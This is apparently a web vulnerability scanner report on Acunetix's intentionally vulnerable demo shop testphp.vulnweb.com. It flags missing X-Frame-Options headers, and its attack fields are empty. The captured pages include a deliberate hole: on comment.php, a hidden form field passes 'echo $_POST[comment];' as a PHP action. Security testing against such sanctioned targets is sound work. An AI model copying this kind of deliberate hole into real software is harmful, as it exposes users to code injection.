GET http://testphp.vulnweb.com/cart.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:46 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 4903 |
Response Body - size: 4,903 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>you cart</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Error</h2> <div class='story'> <p>You are not logged on. To log on please visit our <a href='login.php'>login page</a></p> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/categories.php |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 265 bytes. |
GET http://testphp.vulnweb.com/categories.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:44 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6115 |
Response Body - size: 6,115 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture categories</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">categories</h2> <div class='story'><a href='listproducts.php?cat=1'><h3>Posters</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</div><div class='story'><a href='listproducts.php?cat=2'><h3>Paintings</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</div><div class='story'><a href='listproducts.php?cat=3'><h3>Stickers</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</div><div class='story'><a href='listproducts.php?cat=4'><h3>Graffity</h3></a>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. Vestibulum condimentum facilisis nulla. In hac habitasse platea dictumst. Nulla nonummy. Cras quis libero. Cras venenati</div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/comment.php?aid=1 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 413 bytes. |
GET http://testphp.vulnweb.com/comment.php?aid=1 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/artists.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:50 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 1252 |
Response Body - size: 1,252 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title> comment on artist</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --> </style> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <form action="comment.php" method="post" enctype="application/x-www-form-urlencoded" name="fComment" id="fComment"> <br> <table border="0" width="320" height="200"> <tr> <td valign="top" class="story" align="left">Name</td> <td valign="top"><input name="name" type="text" id="name" value="<your name here>" size="25"></td> </tr> <tr> <td valign="top" class="story" align="left">Comment</td> <td valign="top"><textarea name="comment" cols="35" rows="8" wrap="VIRTUAL" id="comment"></textarea></td> </tr> <tr> <td> </td> <td align="left" valign="top"><input type="submit" name="Submit" value="Submit"><input type="hidden" name="phpaction" value="echo $_POST[comment];"></td> </tr> </table> </form> </body> </html> |
URL | http://testphp.vulnweb.com/comment.php?aid=2 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 413 bytes. |
GET http://testphp.vulnweb.com/comment.php?aid=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/artists.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:18:01 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 1252 |
Response Body - size: 1,252 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title> comment on artist</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --> </style> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <form action="comment.php" method="post" enctype="application/x-www-form-urlencoded" name="fComment" id="fComment"> <br> <table border="0" width="320" height="200"> <tr> <td valign="top" class="story" align="left">Name</td> <td valign="top"><input name="name" type="text" id="name" value="<your name here>" size="25"></td> </tr> <tr> <td valign="top" class="story" align="left">Comment</td> <td valign="top"><textarea name="comment" cols="35" rows="8" wrap="VIRTUAL" id="comment"></textarea></td> </tr> <tr> <td> </td> <td align="left" valign="top"><input type="submit" name="Submit" value="Submit"><input type="hidden" name="phpaction" value="echo $_POST[comment];"></td> </tr> </table> </form> </body> </html> |
URL | http://testphp.vulnweb.com/comment.php?aid=3 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 413 bytes. |
GET http://testphp.vulnweb.com/comment.php?aid=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Referer: http://testphp.vulnweb.com/artists.php Upgrade-Insecure-Requests: 1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:18:19 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 1252 |
Response Body - size: 1,252 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title> comment on artist</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <style type="text/css"> <!-- body { margin-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; } --> </style> <link href="style.css" rel="stylesheet" type="text/css"> </head> <body> <form action="comment.php" method="post" enctype="application/x-www-form-urlencoded" name="fComment" id="fComment"> <br> <table border="0" width="320" height="200"> <tr> <td valign="top" class="story" align="left">Name</td> <td valign="top"><input name="name" type="text" id="name" value="<your name here>" size="25"></td> </tr> <tr> <td valign="top" class="story" align="left">Comment</td> <td valign="top"><textarea name="comment" cols="35" rows="8" wrap="VIRTUAL" id="comment"></textarea></td> </tr> <tr> <td> </td> <td align="left" valign="top"><input type="submit" name="Submit" value="Submit"><input type="hidden" name="phpaction" value="echo $_POST[comment];"></td> </tr> </table> </form> </body> </html> |
URL | http://testphp.vulnweb.com/disclaimer.php |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 265 bytes. |
GET http://testphp.vulnweb.com/disclaimer.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:46 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5524 |
Response Body - size: 5,524 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>disclaimer</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- here goes headers headers --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id="pageName">Disclaimer</h2> <div class="story"> <h6>Please read carefully</h6> <p>This website is created to demonstrate the abilities of Acunetix new product <strong>WEB Vulnerability Scanner</strong>.</p> It is not intended to be a real online shop. Also this website was constructed with common web programming errors so it is buggy. <p>Please do not post any confidential information on this site. Do not give any creditcard number or real address, nor e-mail or website addresses.</p> <p>Information you post on this site are by no means private nor protected!</p> <p>All images on this site were generated with fre software <a href="http://www.eclectasy.com/Fractal-Explorer/index.html" target="_blank"> <strong>Fractal Explorer</strong></a>.</p> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/guestbook.php |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 264 bytes. |
GET http://testphp.vulnweb.com/guestbook.php HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:47 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 5390 |
Response Body - size: 5,390 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>guestbook</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <div class="story"> <table width="100%" cellpadding="4" cellspacing="1"><tr><td colspan="2"><h2>Our guestbook</h2></td></tr><tr><td align="left" valign="middle" style="background-color:#F5F5F5"><strong></strong></td><td align="right" style="background-color:#F5F5F5">12.13.2022, 4:16 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif"> </td></tr></table> </div> <div class="story"> <form action="" method="post" name="faddentry"> <input type="hidden" name="name" value="anonymous user"> <textarea name="text" rows="5" wrap="VIRTUAL" style="width:500px;"></textarea> <br> <input type="submit" name="submit" value="add message"> </form> </div> </div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/hpp/ |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 255 bytes. |
GET http://testphp.vulnweb.com/hpp/ HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:16:50 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 203 |
Response Body - size: 203 bytes. |
<title>HTTP Parameter Pollution Example</title>
<a href="?pp=12">check</a><br/> <hr> <a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a> |
URL | http://testphp.vulnweb.com/hpp/?pp=12 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 266 bytes. |
GET http://testphp.vulnweb.com/hpp/?pp=12 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/hpp/ |
Request Body - size: 0 bytes. |
|
Response Header - size: 221 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:05 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 383 |
Response Body - size: 383 bytes. |
<title>HTTP Parameter Pollution Example</title>
<a href="?pp=12">check</a><br/> <a href="params.php?p=valid&pp=12">link1</a><br/><a href="params.php?p=valid&pp=12">link2</a><br/><form action="params.php?p=valid&pp=12"><input type=submit name=aaaa/></form><br/> <hr> <a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a> |
URL | http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 290 bytes. |
